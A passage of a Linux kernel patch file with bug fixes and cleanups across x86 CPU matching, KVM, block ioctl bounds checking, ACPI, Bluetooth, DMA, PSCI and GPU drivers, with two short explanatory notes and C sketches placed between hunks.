++#define __do_outsw(p, b, n)	writesw((PCI_IO_ADDR)(_IO_BASE+(p)),(b),(n))
++#define __do_outsl(p, b, n)	writesl((PCI_IO_ADDR)(_IO_BASE+(p)),(b),(n))
+ 
+ #define __do_memset_io(addr, c, n)	\
+ 				_memset_io(PCI_FIX_ADDR(addr), c, n)
+diff --git a/arch/x86/include/asm/cpu_device_id.h b/arch/x86/include/asm/cpu_device_id.h
+index eb8fcede9e3bf..e8e3dbe7f1730 100644
+--- a/arch/x86/include/asm/cpu_device_id.h
++++ b/arch/x86/include/asm/cpu_device_id.h
+@@ -2,6 +2,39 @@
+ #ifndef _ASM_X86_CPU_DEVICE_ID
+ #define _ASM_X86_CPU_DEVICE_ID
+ 
++/*
++ * Can't use <linux/bitfield.h> because it generates expressions that
++ * cannot be used in structure initializers. Bitfield construction
++ * here must match the union in struct cpuinfo_86:
++ *	union {
++ *		struct {
++ *			__u8	x86_model;
++ *			__u8	x86;
++ *			__u8	x86_vendor;
++ *			__u8	x86_reserved;
++ *		};
++ *		__u32		x86_vfm;
++ *	};
++ */
++#define VFM_MODEL_BIT	0
++#define VFM_FAMILY_BIT	8
++#define VFM_VENDOR_BIT	16
++#define VFM_RSVD_BIT	24
++
++#define	VFM_MODEL_MASK	GENMASK(VFM_FAMILY_BIT - 1, VFM_MODEL_BIT)
++#define	VFM_FAMILY_MASK	GENMASK(VFM_VENDOR_BIT - 1, VFM_FAMILY_BIT)
++#define	VFM_VENDOR_MASK	GENMASK(VFM_RSVD_BIT - 1, VFM_VENDOR_BIT)
++
++#define VFM_MODEL(vfm)	(((vfm) & VFM_MODEL_MASK) >> VFM_MODEL_BIT)
++#define VFM_FAMILY(vfm)	(((vfm) & VFM_FAMILY_MASK) >> VFM_FAMILY_BIT)
++#define VFM_VENDOR(vfm)	(((vfm) & VFM_VENDOR_MASK) >> VFM_VENDOR_BIT)
++
++#define	VFM_MAKE(_vendor, _family, _model) (	\
++	((_model) << VFM_MODEL_BIT) |		\
++	((_family) << VFM_FAMILY_BIT) |		\
++	((_vendor) << VFM_VENDOR_BIT)		\
++)
++
+ /*
+  * Declare drivers belonging to specific x86 CPUs
+  * Similar in spirit to pci_device_id and related PCI functions
+@@ -20,6 +53,9 @@
+ #define X86_CENTAUR_FAM6_C7_D		0xd
+ #define X86_CENTAUR_FAM6_NANO		0xf
+ 
++/* x86_cpu_id::flags */
++#define X86_CPU_ID_FLAG_ENTRY_VALID	BIT(0)
++
+ #define X86_STEPPINGS(mins, maxs)    GENMASK(maxs, mins)
+ /**
+  * X86_MATCH_VENDOR_FAM_MODEL_STEPPINGS_FEATURE - Base macro for CPU matching
+@@ -46,6 +82,18 @@
+ 	.model		= _model,					\
+ 	.steppings	= _steppings,					\
+ 	.feature	= _feature,					\
++	.flags		= X86_CPU_ID_FLAG_ENTRY_VALID,			\
++	.driver_data	= (unsigned long) _data				\
++}
++
++#define X86_MATCH_VENDORID_FAM_MODEL_STEPPINGS_FEATURE(_vendor, _family, _model, \
++						    _steppings, _feature, _data) { \
++	.vendor		= _vendor,					\
++	.family		= _family,					\
++	.model		= _model,					\
++	.steppings	= _steppings,					\
++	.feature	= _feature,					\
++	.flags		= X86_CPU_ID_FLAG_ENTRY_VALID,			\
+ 	.driver_data	= (unsigned long) _data				\
+ }
+ 
+@@ -164,6 +212,56 @@
+ 	X86_MATCH_VENDOR_FAM_MODEL_STEPPINGS_FEATURE(INTEL, 6, INTEL_FAM6_##model, \
+ 						     steppings, X86_FEATURE_ANY, data)
+ 
++/**
++ * X86_MATCH_VFM - Match encoded vendor/family/model
++ * @vfm:	Encoded 8-bits each for vendor, family, model
++ * @data:	Driver specific data or NULL. The internal storage
++ *		format is unsigned long. The supplied value, pointer
++ *		etc. is cast to unsigned long internally.
++ *
++ * Stepping and feature are set to wildcards
++ */
++#define X86_MATCH_VFM(vfm, data)			\
++	X86_MATCH_VENDORID_FAM_MODEL_STEPPINGS_FEATURE(	\
++		VFM_VENDOR(vfm),			\
++		VFM_FAMILY(vfm),			\
++		VFM_MODEL(vfm),				\
++		X86_STEPPING_ANY, X86_FEATURE_ANY, data)
++
++/**
++ * X86_MATCH_VFM_STEPPINGS - Match encoded vendor/family/model/stepping
++ * @vfm:	Encoded 8-bits each for vendor, family, model
++ * @steppings:	Bitmask of steppings to match
++ * @data:	Driver specific data or NULL. The internal storage
++ *		format is unsigned long. The supplied value, pointer
++ *		etc. is cast to unsigned long internally.
++ *
++ * feature is set to wildcard
++ */
++#define X86_MATCH_VFM_STEPPINGS(vfm, steppings, data)	\
++	X86_MATCH_VENDORID_FAM_MODEL_STEPPINGS_FEATURE(	\
++		VFM_VENDOR(vfm),			\
++		VFM_FAMILY(vfm),			\
++		VFM_MODEL(vfm),				\
++		steppings, X86_FEATURE_ANY, data)
++
++/**
++ * X86_MATCH_VFM_FEATURE - Match encoded vendor/family/model/feature
++ * @vfm:	Encoded 8-bits each for vendor, family, model
++ * @feature:	A X86_FEATURE bit
++ * @data:	Driver specific data or NULL. The internal storage
++ *		format is unsigned long. The supplied value, pointer
++ *		etc. is cast to unsigned long internally.
++ *
++ * Steppings is set to wildcard
++ */
++#define X86_MATCH_VFM_FEATURE(vfm, feature, data)	\
++	X86_MATCH_VENDORID_FAM_MODEL_STEPPINGS_FEATURE(	\
++		VFM_VENDOR(vfm),			\
++		VFM_FAMILY(vfm),			\
++		VFM_MODEL(vfm),				\
++		X86_STEPPING_ANY, feature, data)
++
+ /*
+  * Match specific microcode revisions.
+  *
+diff --git a/arch/x86/kernel/cpu/match.c b/arch/x86/kernel/cpu/match.c
+index ad6776081e60d..ae71b8ef909c9 100644
+--- a/arch/x86/kernel/cpu/match.c
++++ b/arch/x86/kernel/cpu/match.c
+@@ -39,9 +39,7 @@ const struct x86_cpu_id *x86_match_cpu(const struct x86_cpu_id *match)
+ 	const struct x86_cpu_id *m;
+ 	struct cpuinfo_x86 *c = &boot_cpu_data;
+ 
+-	for (m = match;
+-	     m->vendor | m->family | m->model | m->steppings | m->feature;
+-	     m++) {
++	for (m = match; m->flags & X86_CPU_ID_FLAG_ENTRY_VALID; m++) {
+ 		if (m->vendor != X86_VENDOR_ANY && c->x86_vendor != m->vendor)
+ 			continue;
+ 		if (m->family != X86_FAMILY_ANY && c->x86 != m->family)
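
The match.c hunk above replaces the old all-fields-zero terminator test with an explicit validity flag, since a legitimate wildcard entry could otherwise be mistaken for the end of the table. A sketch of the idea with a hypothetical table type:

#include <stddef.h>
#include <stdint.h>

#define ENTRY_VALID (1u << 0)

struct cpu_match {
	uint16_t vendor, family;
	uint16_t flags;
};

static const struct cpu_match *match_cpu(const struct cpu_match *tbl,
					 uint16_t vendor, uint16_t family)
{
	/* the zeroed sentinel entry {} has flags == 0 and ends the walk */
	for (const struct cpu_match *m = tbl; m->flags & ENTRY_VALID; m++)
		if (m->vendor == vendor && m->family == family)
			return m;
	return NULL;
}
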
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index a2ea636a23086..53d83b37db8c8 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -10523,13 +10523,12 @@ static void vcpu_scan_ioapic(struct kvm_vcpu *vcpu)
+ 
+ 	bitmap_zero(vcpu->arch.ioapic_handled_vectors, 256);
+ 
++	static_call_cond(kvm_x86_sync_pir_to_irr)(vcpu);
++
+ 	if (irqchip_split(vcpu->kvm))
+ 		kvm_scan_ioapic_routes(vcpu, vcpu->arch.ioapic_handled_vectors);
+-	else {
+-		static_call_cond(kvm_x86_sync_pir_to_irr)(vcpu);
+-		if (ioapic_in_kernel(vcpu->kvm))
+-			kvm_ioapic_scan_entry(vcpu, vcpu->arch.ioapic_handled_vectors);
+-	}
++	else if (ioapic_in_kernel(vcpu->kvm))
++		kvm_ioapic_scan_entry(vcpu, vcpu->arch.ioapic_handled_vectors);
+ 
+ 	if (is_guest_mode(vcpu))
+ 		vcpu->arch.load_eoi_exitmap_pending = true;
+diff --git a/block/ioctl.c b/block/ioctl.c
+index 99b8e2e448729..c7390d8c9fc73 100644
+--- a/block/ioctl.c
++++ b/block/ioctl.c
+@@ -33,7 +33,7 @@ static int blkpg_do_ioctl(struct block_device *bdev,
+ 	if (op == BLKPG_DEL_PARTITION)
+ 		return bdev_del_partition(disk, p.pno);
+ 
+-	if (p.start < 0 || p.length <= 0 || p.start + p.length < 0)
++	if (p.start < 0 || p.length <= 0 || LLONG_MAX - p.length < p.start)
+ 		return -EINVAL;
+ 	/* Check that the partition is aligned to the block size */
+ 	if (!IS_ALIGNED(p.start | p.length, bdev_logical_block_size(bdev)))
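
The blkpg hunk above rewrites the bounds test so it cannot overflow: summing two positive long long values is undefined behavior when the result wraps, so the check compares against LLONG_MAX by subtraction instead. A standalone sketch:

#include <limits.h>
#include <stdbool.h>

static bool range_ok(long long start, long long length)
{
	if (start < 0 || length <= 0)
		return false;
	/* equivalent to "start + length <= LLONG_MAX", without the sum */
	return LLONG_MAX - length >= start;
}
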
+diff --git a/drivers/acpi/acpica/exregion.c b/drivers/acpi/acpica/exregion.c
+index 4ff35852c0b38..8906aa4464054 100644
+--- a/drivers/acpi/acpica/exregion.c
++++ b/drivers/acpi/acpica/exregion.c
+@@ -44,7 +44,6 @@ acpi_ex_system_memory_space_handler(u32 function,
+ 	struct acpi_mem_mapping *mm = mem_info->cur_mm;
+ 	u32 length;
+ 	acpi_size map_length;
+-	acpi_size page_boundary_map_length;
+ #ifdef ACPI_MISALIGNMENT_NOT_SUPPORTED
+ 	u32 remainder;
+ #endif
+@@ -138,26 +137,8 @@ acpi_ex_system_memory_space_handler(u32 function,
+ 		map_length = (acpi_size)
+ 		    ((mem_info->address + mem_info->length) - address);
+ 
+-		/*
+-		 * If mapping the entire remaining portion of the region will cross
+-		 * a page boundary, just map up to the page boundary, do not cross.
+-		 * On some systems, crossing a page boundary while mapping regions
+-		 * can cause warnings if the pages have different attributes
+-		 * due to resource management.
+-		 *
+-		 * This has the added benefit of constraining a single mapping to
+-		 * one page, which is similar to the original code that used a 4k
+-		 * maximum window.
+-		 */
+-		page_boundary_map_length = (acpi_size)
+-		    (ACPI_ROUND_UP(address, ACPI_DEFAULT_PAGE_SIZE) - address);
+-		if (page_boundary_map_length == 0) {
+-			page_boundary_map_length = ACPI_DEFAULT_PAGE_SIZE;
+-		}
+-
+-		if (map_length > page_boundary_map_length) {
+-			map_length = page_boundary_map_length;
+-		}
++		if (map_length > ACPI_DEFAULT_PAGE_SIZE)
++			map_length = ACPI_DEFAULT_PAGE_SIZE;
+ 
+ 		/* Create a new mapping starting at the address given */
+ 
+diff --git a/drivers/bluetooth/ath3k.c b/drivers/bluetooth/ath3k.c
+index 88262d3a93923..ce97b336fbfb8 100644
+--- a/drivers/bluetooth/ath3k.c
++++ b/drivers/bluetooth/ath3k.c
+@@ -3,7 +3,6 @@
+  * Copyright (c) 2008-2009 Atheros Communications Inc.
+  */
+ 
+-
+ #include <linux/module.h>
+ #include <linux/kernel.h>
+ #include <linux/init.h>
+@@ -128,7 +127,6 @@ MODULE_DEVICE_TABLE(usb, ath3k_table);
+  * for AR3012
+  */
+ static const struct usb_device_id ath3k_blist_tbl[] = {
+-
+ 	/* Atheros AR3012 with sflash firmware*/
+ 	{ USB_DEVICE(0x0489, 0xe04e), .driver_info = BTUSB_ATH3012 },
+ 	{ USB_DEVICE(0x0489, 0xe04d), .driver_info = BTUSB_ATH3012 },
+@@ -202,7 +200,7 @@ static inline void ath3k_log_failed_loading(int err, int len, int size,
+ #define TIMEGAP_USEC_MAX	100
+ 
+ static int ath3k_load_firmware(struct usb_device *udev,
+-				const struct firmware *firmware)
++			       const struct firmware *firmware)
+ {
+ 	u8 *send_buf;
+ 	int len = 0;
+@@ -237,9 +235,9 @@ static int ath3k_load_firmware(struct usb_device *udev,
+ 		memcpy(send_buf, firmware->data + sent, size);
+ 
+ 		err = usb_bulk_msg(udev, pipe, send_buf, size,
+-					&len, 3000);
++				   &len, 3000);
+ 
+-		if (err || (len != size)) {
++		if (err || len != size) {
+ 			ath3k_log_failed_loading(err, len, size, count);
+ 			goto error;
+ 		}
+@@ -262,7 +260,7 @@ static int ath3k_get_state(struct usb_device *udev, unsigned char *state)
+ }
+ 
+ static int ath3k_get_version(struct usb_device *udev,
+-			struct ath3k_version *version)
++			     struct ath3k_version *version)
+ {
+ 	return usb_control_msg_recv(udev, 0, ATH3K_GETVERSION,
+ 				    USB_TYPE_VENDOR | USB_DIR_IN, 0, 0,
+@@ -271,7 +269,7 @@ static int ath3k_get_version(struct usb_device *udev,
+ }
+ 
+ static int ath3k_load_fwfile(struct usb_device *udev,
+-		const struct firmware *firmware)
++			     const struct firmware *firmware)
+ {
+ 	u8 *send_buf;
+ 	int len = 0;
+@@ -310,8 +308,8 @@ static int ath3k_load_fwfile(struct usb_device *udev,
+ 		memcpy(send_buf, firmware->data + sent, size);
+ 
+ 		err = usb_bulk_msg(udev, pipe, send_buf, size,
+-					&len, 3000);
+-		if (err || (len != size)) {
++				   &len, 3000);
++		if (err || len != size) {
+ 			ath3k_log_failed_loading(err, len, size, count);
+ 			kfree(send_buf);
+ 			return err;
+@@ -425,7 +423,6 @@ static int ath3k_load_syscfg(struct usb_device *udev)
+ 	}
+ 
+ 	switch (fw_version.ref_clock) {
+-
+ 	case ATH3K_XTAL_FREQ_26M:
+ 		clk_value = 26;
+ 		break;
+@@ -441,7 +438,7 @@ static int ath3k_load_syscfg(struct usb_device *udev)
+ 	}
+ 
+ 	snprintf(filename, ATH3K_NAME_LEN, "ar3k/ramps_0x%08x_%d%s",
+-		le32_to_cpu(fw_version.rom_version), clk_value, ".dfu");
++		 le32_to_cpu(fw_version.rom_version), clk_value, ".dfu");
+ 
+ 	ret = request_firmware(&firmware, filename, &udev->dev);
+ 	if (ret < 0) {
+@@ -456,7 +453,7 @@ static int ath3k_load_syscfg(struct usb_device *udev)
+ }
+ 
+ static int ath3k_probe(struct usb_interface *intf,
+-			const struct usb_device_id *id)
++		       const struct usb_device_id *id)
+ {
+ 	const struct firmware *firmware;
+ 	struct usb_device *udev = interface_to_usbdev(intf);
+@@ -505,10 +502,10 @@ static int ath3k_probe(struct usb_interface *intf,
+ 	if (ret < 0) {
+ 		if (ret == -ENOENT)
+ 			BT_ERR("Firmware file \"%s\" not found",
+-							ATH3K_FIRMWARE);
++			       ATH3K_FIRMWARE);
+ 		else
+ 			BT_ERR("Firmware file \"%s\" request failed (err=%d)",
+-							ATH3K_FIRMWARE, ret);
++			       ATH3K_FIRMWARE, ret);
+ 		return ret;
+ 	}
+ 
+diff --git a/drivers/crypto/hisilicon/sec2/sec_crypto.c b/drivers/crypto/hisilicon/sec2/sec_crypto.c
+index cae7c414bdaf4..09a20307d01e3 100644
+--- a/drivers/crypto/hisilicon/sec2/sec_crypto.c
++++ b/drivers/crypto/hisilicon/sec2/sec_crypto.c
+@@ -479,8 +479,10 @@ static void sec_alg_resource_free(struct sec_ctx *ctx,
+ 
+ 	if (ctx->pbuf_supported)
+ 		sec_free_pbuf_resource(dev, qp_ctx->res);
+-	if (ctx->alg_type == SEC_AEAD)
++	if (ctx->alg_type == SEC_AEAD) {
+ 		sec_free_mac_resource(dev, qp_ctx->res);
++		sec_free_aiv_resource(dev, qp_ctx->res);
++	}
+ }
+ 
+ static int sec_alloc_qp_ctx_resource(struct hisi_qm *qm, struct sec_ctx *ctx,
+diff --git a/drivers/dma/dw-axi-dmac/dw-axi-dmac-platform.c b/drivers/dma/dw-axi-dmac/dw-axi-dmac-platform.c
+index 152c5d98524d7..7596864bf8bb2 100644
+--- a/drivers/dma/dw-axi-dmac/dw-axi-dmac-platform.c
++++ b/drivers/dma/dw-axi-dmac/dw-axi-dmac-platform.c
+@@ -250,6 +250,7 @@ static struct axi_dma_desc *axi_desc_alloc(u32 num)
+ 		kfree(desc);
+ 		return NULL;
+ 	}
++	desc->nr_hw_descs = num;
+ 
+ 	return desc;
+ }
+@@ -276,7 +277,7 @@ static struct axi_dma_lli *axi_desc_get(struct axi_dma_chan *chan,
+ static void axi_desc_put(struct axi_dma_desc *desc)
+ {
+ 	struct axi_dma_chan *chan = desc->chan;
+-	int count = atomic_read(&chan->descs_allocated);
++	int count = desc->nr_hw_descs;
+ 	struct axi_dma_hw_desc *hw_desc;
+ 	int descs_put;
+ 
+@@ -1087,9 +1088,6 @@ static void axi_chan_block_xfer_complete(struct axi_dma_chan *chan)
+ 		/* Remove the completed descriptor from issued list before completing */
+ 		list_del(&vd->node);
+ 		vchan_cookie_complete(vd);
+-
+-		/* Submit queued descriptors after processing the completed ones */
+-		axi_chan_start_first_queued(chan);
+ 	}
+ 
+ out:
+diff --git a/drivers/dma/dw-axi-dmac/dw-axi-dmac.h b/drivers/dma/dw-axi-dmac/dw-axi-dmac.h
+index e9d5eb0fd5948..764427a66f5e8 100644
+--- a/drivers/dma/dw-axi-dmac/dw-axi-dmac.h
++++ b/drivers/dma/dw-axi-dmac/dw-axi-dmac.h
+@@ -103,6 +103,7 @@ struct axi_dma_desc {
+ 	u32				completed_blocks;
+ 	u32				length;
+ 	u32				period_len;
++	u32				nr_hw_descs;
+ };
+ 
+ struct axi_dma_chan_config {
+diff --git a/drivers/dma/idxd/irq.c b/drivers/dma/idxd/irq.c
+index aa314ebec5878..4a3eb96b8199a 100644
+--- a/drivers/dma/idxd/irq.c
++++ b/drivers/dma/idxd/irq.c
+@@ -454,11 +454,13 @@ static void irq_process_work_list(struct idxd_irq_entry *irq_entry)
+ 
+ 	spin_unlock(&irq_entry->list_lock);
+ 
+-	list_for_each_entry(desc, &flist, list) {
++	list_for_each_entry_safe(desc, n, &flist, list) {
+ 		/*
+ 		 * Check against the original status as ABORT is software defined
+ 		 * and 0xff, which DSA_COMP_STATUS_MASK can mask out.
+ 		 */
++		list_del(&desc->list);
++
+ 		if (unlikely(desc->completion->status == IDXD_COMP_DESC_ABORT)) {
+ 			idxd_dma_complete_txd(desc, IDXD_COMPLETE_ABORT, true);
+ 			continue;
+diff --git a/drivers/dma/ioat/init.c b/drivers/dma/ioat/init.c
+index 5d707ff635542..ec8b2b5e4ef00 100644
+--- a/drivers/dma/ioat/init.c
++++ b/drivers/dma/ioat/init.c
+@@ -15,7 +15,6 @@
+ #include <linux/workqueue.h>
+ #include <linux/prefetch.h>
+ #include <linux/dca.h>
+-#include <linux/aer.h>
+ #include <linux/sizes.h>
+ #include "dma.h"
+ #include "registers.h"
+@@ -535,18 +534,6 @@ static int ioat_probe(struct ioatdma_device *ioat_dma)
+ 	return err;
+ }
+ 
+-static int ioat_register(struct ioatdma_device *ioat_dma)
+-{
+-	int err = dma_async_device_register(&ioat_dma->dma_dev);
+-
+-	if (err) {
+-		ioat_disable_interrupts(ioat_dma);
+-		dma_pool_destroy(ioat_dma->completion_pool);
+-	}
+-
+-	return err;
+-}
+-
+ static void ioat_dma_remove(struct ioatdma_device *ioat_dma)
+ {
+ 	struct dma_device *dma = &ioat_dma->dma_dev;
+@@ -1181,9 +1168,9 @@ static int ioat3_dma_probe(struct ioatdma_device *ioat_dma, int dca)
+ 		       ioat_chan->reg_base + IOAT_DCACTRL_OFFSET);
+ 	}
+ 
+-	err = ioat_register(ioat_dma);
++	err = dma_async_device_register(&ioat_dma->dma_dev);
+ 	if (err)
+-		return err;
++		goto err_disable_interrupts;
+ 
+ 	ioat_kobject_add(ioat_dma, &ioat_ktype);
+ 
+@@ -1191,21 +1178,30 @@ static int ioat3_dma_probe(struct ioatdma_device *ioat_dma, int dca)
+ 		ioat_dma->dca = ioat_dca_init(pdev, ioat_dma->reg_base);
+ 
+ 	/* disable relaxed ordering */
+-	err = pcie_capability_read_word(pdev, IOAT_DEVCTRL_OFFSET, &val16);
+-	if (err)
+-		return pcibios_err_to_errno(err);
++	err = pcie_capability_read_word(pdev, PCI_EXP_DEVCTL, &val16);
++	if (err) {
++		err = pcibios_err_to_errno(err);
++		goto err_disable_interrupts;
++	}
+ 
+ 	/* clear relaxed ordering enable */
+-	val16 &= ~IOAT_DEVCTRL_ROE;
+-	err = pcie_capability_write_word(pdev, IOAT_DEVCTRL_OFFSET, val16);
+-	if (err)
+-		return pcibios_err_to_errno(err);
++	val16 &= ~PCI_EXP_DEVCTL_RELAX_EN;
++	err = pcie_capability_write_word(pdev, PCI_EXP_DEVCTL, val16);
++	if (err) {
++		err = pcibios_err_to_errno(err);
++		goto err_disable_interrupts;
++	}
+ 
+ 	if (ioat_dma->cap & IOAT_CAP_DPS)
+ 		writeb(ioat_pending_level + 1,
+ 		       ioat_dma->reg_base + IOAT_PREFETCH_LIMIT_OFFSET);
+ 
+ 	return 0;
++
++err_disable_interrupts:
++	ioat_disable_interrupts(ioat_dma);
++	dma_pool_destroy(ioat_dma->completion_pool);
++	return err;
+ }
+ 
+ static void ioat_shutdown(struct pci_dev *pdev)
+@@ -1350,6 +1346,8 @@ static int ioat_pci_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	void __iomem * const *iomap;
+ 	struct device *dev = &pdev->dev;
+ 	struct ioatdma_device *device;
++	unsigned int i;
++	u8 version;
+ 	int err;
+ 
+ 	err = pcim_enable_device(pdev);
+@@ -1363,6 +1361,10 @@ static int ioat_pci_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	if (!iomap)
+ 		return -ENOMEM;
+ 
++	version = readb(iomap[IOAT_MMIO_BAR] + IOAT_VER_OFFSET);
++	if (version < IOAT_VER_3_0)
++		return -ENODEV;
++
+ 	err = dma_set_mask_and_coherent(&pdev->dev, DMA_BIT_MASK(64));
+ 	if (err)
+ 		return err;
+@@ -1373,22 +1375,19 @@ static int ioat_pci_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	pci_set_master(pdev);
+ 	pci_set_drvdata(pdev, device);
+ 
+-	device->version = readb(device->reg_base + IOAT_VER_OFFSET);
++	device->version = version;
+ 	if (device->version >= IOAT_VER_3_4)
+ 		ioat_dca_enabled = 0;
+-	if (device->version >= IOAT_VER_3_0) {
+-		if (is_skx_ioat(pdev))
+-			device->version = IOAT_VER_3_2;
+-		err = ioat3_dma_probe(device, ioat_dca_enabled);
+-
+-		if (device->version >= IOAT_VER_3_3)
+-			pci_enable_pcie_error_reporting(pdev);
+-	} else
+-		return -ENODEV;
+ 
++	if (is_skx_ioat(pdev))
++		device->version = IOAT_VER_3_2;
++
++	err = ioat3_dma_probe(device, ioat_dca_enabled);
+ 	if (err) {
++		for (i = 0; i < IOAT_MAX_CHANS; i++)
++			kfree(device->idx[i]);
++		kfree(device);
+ 		dev_err(dev, "Intel(R) I/OAT DMA Engine init failed\n");
+-		pci_disable_pcie_error_reporting(pdev);
+ 		return -ENODEV;
+ 	}
+ 
+@@ -1411,7 +1410,6 @@ static void ioat_remove(struct pci_dev *pdev)
+ 		device->dca = NULL;
+ 	}
+ 
+-	pci_disable_pcie_error_reporting(pdev);
+ 	ioat_dma_remove(device);
+ }
+ 
+@@ -1450,6 +1448,7 @@ module_init(ioat_init_module);
+ static void __exit ioat_exit_module(void)
+ {
+ 	pci_unregister_driver(&ioat_pci_driver);
++	kmem_cache_destroy(ioat_sed_cache);
+ 	kmem_cache_destroy(ioat_cache);
+ }
+ module_exit(ioat_exit_module);
+diff --git a/drivers/dma/ioat/registers.h b/drivers/dma/ioat/registers.h
+index f55a5f92f1857..54cf0ad39887b 100644
+--- a/drivers/dma/ioat/registers.h
++++ b/drivers/dma/ioat/registers.h
+@@ -14,13 +14,6 @@
+ #define IOAT_PCI_CHANERR_INT_OFFSET		0x180
+ #define IOAT_PCI_CHANERRMASK_INT_OFFSET		0x184
+ 
+-/* PCIe config registers */
+-
+-/* EXPCAPID + N */
+-#define IOAT_DEVCTRL_OFFSET			0x8
+-/* relaxed ordering enable */
+-#define IOAT_DEVCTRL_ROE			0x10
+-
+ /* MMIO Device Registers */
+ #define IOAT_CHANCNT_OFFSET			0x00	/*  8-bit */
+ 
+diff --git a/drivers/firmware/psci/psci.c b/drivers/firmware/psci/psci.c
+index f78249fe2512a..a44ba09e49d9c 100644
+--- a/drivers/firmware/psci/psci.c
++++ b/drivers/firmware/psci/psci.c
+@@ -485,10 +485,12 @@ int psci_cpu_suspend_enter(u32 state)
+ 
+ static int psci_system_suspend(unsigned long unused)
+ {
++	int err;
+ 	phys_addr_t pa_cpu_resume = __pa_symbol(cpu_resume);
+ 
+-	return invoke_psci_fn(PSCI_FN_NATIVE(1_0, SYSTEM_SUSPEND),
++	err = invoke_psci_fn(PSCI_FN_NATIVE(1_0, SYSTEM_SUSPEND),
+ 			      pa_cpu_resume, 0, 0);
++	return psci_to_linux_errno(err);
+ }
+ 
+ static int psci_system_suspend_enter(suspend_state_t state)
+diff --git a/drivers/gpu/drm/amd/pm/legacy-dpm/kv_dpm.c b/drivers/gpu/drm/amd/pm/legacy-dpm/kv_dpm.c
+index d17bfa111aa74..a24f3b35ae914 100644
+--- a/drivers/gpu/drm/amd/pm/legacy-dpm/kv_dpm.c
++++ b/drivers/gpu/drm/amd/pm/legacy-dpm/kv_dpm.c
+@@ -164,6 +164,8 @@ static void sumo_construct_vid_mapping_table(struct amdgpu_device *adev,
+ 
+ 	for (i = 0; i < SUMO_MAX_HARDWARE_POWERLEVELS; i++) {
+ 		if (table[i].ulSupportedSCLK != 0) {
++			if (table[i].usVoltageIndex >= SUMO_MAX_NUMBER_VOLTAGES)
++				continue;
+ 			vid_mapping_table->entries[table[i].usVoltageIndex].vid_7bit =
+ 				table[i].usVoltageID;
+ 			vid_mapping_table->entries[table[i].usVoltageIndex].vid_2bit =
+diff --git a/drivers/gpu/drm/i915/display/intel_dp.c b/drivers/gpu/drm/i915/display/intel_dp.c
+index 4699c21102261..a27563bfd9097 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp.c
++++ b/drivers/gpu/drm/i915/display/intel_dp.c
+@@ -390,6 +390,10 @@ bool intel_dp_can_bigjoiner(struct intel_dp *intel_dp)
+ 	struct intel_encoder *encoder = &intel_dig_port->base;
+ 	struct drm_i915_private *dev_priv = to_i915(encoder->base.dev);
+ 
++	/* eDP MSO is not compatible with joiner */
++	if (intel_dp->mso_link_count)
++		return false;
++
+ 	return DISPLAY_VER(dev_priv) >= 12 ||
+ 		(DISPLAY_VER(dev_priv) == 11 &&
+ 		 encoder->port != PORT_A);
+diff --git a/drivers/gpu/drm/lima/lima_bcast.c b/drivers/gpu/drm/lima/lima_bcast.c
+index fbc43f243c54d..6d000504e1a4e 100644
+--- a/drivers/gpu/drm/lima/lima_bcast.c
++++ b/drivers/gpu/drm/lima/lima_bcast.c
+@@ -43,6 +43,18 @@ void lima_bcast_suspend(struct lima_ip *ip)
+ 
+ }
+ 
++int lima_bcast_mask_irq(struct lima_ip *ip)
++{
++	bcast_write(LIMA_BCAST_BROADCAST_MASK, 0);
++	bcast_write(LIMA_BCAST_INTERRUPT_MASK, 0);
++	return 0;
++}
++
++int lima_bcast_reset(struct lima_ip *ip)
++{
++	return lima_bcast_hw_init(ip);
++}
++
+ int lima_bcast_init(struct lima_ip *ip)
+ {
+ 	int i;
+diff --git a/drivers/gpu/drm/lima/lima_bcast.h b/drivers/gpu/drm/lima/lima_bcast.h
+index 465ee587bceb2..cd08841e47879 100644
+--- a/drivers/gpu/drm/lima/lima_bcast.h
++++ b/drivers/gpu/drm/lima/lima_bcast.h
+@@ -13,4 +13,7 @@ void lima_bcast_fini(struct lima_ip *ip);
+ 
+ void lima_bcast_enable(struct lima_device *dev, int num_pp);
+ 
++int lima_bcast_mask_irq(struct lima_ip *ip);
++int lima_bcast_reset(struct lima_ip *ip);
++
+ #endif
+diff --git a/drivers/gpu/drm/lima/lima_gp.c b/drivers/gpu/drm/lima/lima_gp.c
+index 8dd501b7a3d0d..6cf46b653e810 100644
+--- a/drivers/gpu/drm/lima/lima_gp.c
++++ b/drivers/gpu/drm/lima/lima_gp.c
+@@ -212,6 +212,13 @@ static void lima_gp_task_mmu_error(struct lima_sched_pipe *pipe)
+ 	lima_sched_pipe_task_done(pipe);
+ }
+ 
++static void lima_gp_task_mask_irq(struct lima_sched_pipe *pipe)
++{
++	struct lima_ip *ip = pipe->processor[0];
++
++	gp_write(LIMA_GP_INT_MASK, 0);
++}
++
+ static int lima_gp_task_recover(struct lima_sched_pipe *pipe)
+ {
+ 	struct lima_ip *ip = pipe->processor[0];
+@@ -344,6 +351,7 @@ int lima_gp_pipe_init(struct lima_device *dev)
+ 	pipe->task_error = lima_gp_task_error;
+ 	pipe->task_mmu_error = lima_gp_task_mmu_error;
+ 	pipe->task_recover = lima_gp_task_recover;
++	pipe->task_mask_irq = lima_gp_task_mask_irq;
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/lima/lima_pp.c b/drivers/gpu/drm/lima/lima_pp.c
+index a5c95bed08c09..54b208a4a768e 100644
+--- a/drivers/gpu/drm/lima/lima_pp.c
++++ b/drivers/gpu/drm/lima/lima_pp.c
+@@ -408,6 +408,9 @@ static void lima_pp_task_error(struct lima_sched_pipe *pipe)
+ 
+ 		lima_pp_hard_reset(ip);
+ 	}
++
++	if (pipe->bcast_processor)
++		lima_bcast_reset(pipe->bcast_processor);
+ }
+ 
+ static void lima_pp_task_mmu_error(struct lima_sched_pipe *pipe)
+@@ -416,6 +419,20 @@ static void lima_pp_task_mmu_error(struct lima_sched_pipe *pipe)
+ 		lima_sched_pipe_task_done(pipe);
+ }
+ 
++static void lima_pp_task_mask_irq(struct lima_sched_pipe *pipe)
++{
++	int i;
++
++	for (i = 0; i < pipe->num_processor; i++) {
++		struct lima_ip *ip = pipe->processor[i];
++
++		pp_write(LIMA_PP_INT_MASK, 0);
++	}
++
++	if (pipe->bcast_processor)
++		lima_bcast_mask_irq(pipe->bcast_processor);
